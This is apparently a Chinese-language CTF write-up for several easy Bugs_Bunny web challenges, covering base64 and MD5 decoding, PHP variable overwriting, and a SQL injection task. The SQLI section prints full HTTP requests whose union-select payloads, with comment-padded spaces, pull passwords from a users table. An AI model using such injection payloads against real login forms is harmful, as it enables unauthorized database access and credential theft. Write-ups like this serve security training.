標籤:md5 com value ati 部分 min ott ring zip
- Nothing here
QnVnc19CdW5ueXs1MjljNDI5YWJkZTIxNzFkMGEyNTU4NDQ3MmFmODIxN30K
Bugs_Bunny{529c429abde2171d0a25584472af8217}
2. Encryption
修改agent,得到兩個hash,
zn8XhqnlBRBetevoFcSQAw0OMVH6Kwj23svbneF1%2B5gDfBdn9osZBfB06cTub4ARg3OTTjsBIG7x
zn8XhqnlBRBetevoFcSQAw0OMVH6Kwj23svbneF1+5gDfBdn9osZBfB06cTub4ARg3OTTjsBIG7x
3.Web100
查看DOM,然後解md5
_ |
|
"6b07fd4ea837c39e1542e1bbca01a224" |
|
__ |
|
"20ee80e63596799a1543bc9fd88d8878" |
|
___ |
|
"21232f297a57a5a743894a0e4a801fc3" |
看懂這一部分就OK,
tunisia bunny admin
inininynusutdamba
Bugs_Bunny{inininynusutdamba}
4. SimplePHP
題目很贊,有個兩個關鍵就是覆蓋POST和覆蓋原來上面定義的兩個變數。
5. SQLI
GET /LQI_X/?username=a‘-0-‘&password=‘or/**/1/**/union/**/select/**/‘z‘/**/order/**/by/**/1--&login=login HTTP/1.1Host: 34.253.165.46User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1
GET /LQI_X/?username=a‘-1-‘&password=‘or/**/0/**/union/**/select/**/(select/**/password/**/from/**/users/**/limit/**/3,1)/**/--&login=login HTTP/1.1Host: 34.253.165.46User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1
Bugs_Bunny{SQLi_Easy_I_Dont_Think}
_Easy_I_Dont_Think}}
Bugs_Bunny{SQLi_Easy_!!_I_Dont_Think}
_Easy_I_Dont_Think
username位置過濾比較嚴苛,在password注入,題目限制比較坑。最後flag我去提交都不對,有毒。
(web)Bugs_Bunny_CTF_writeup 部分簡單web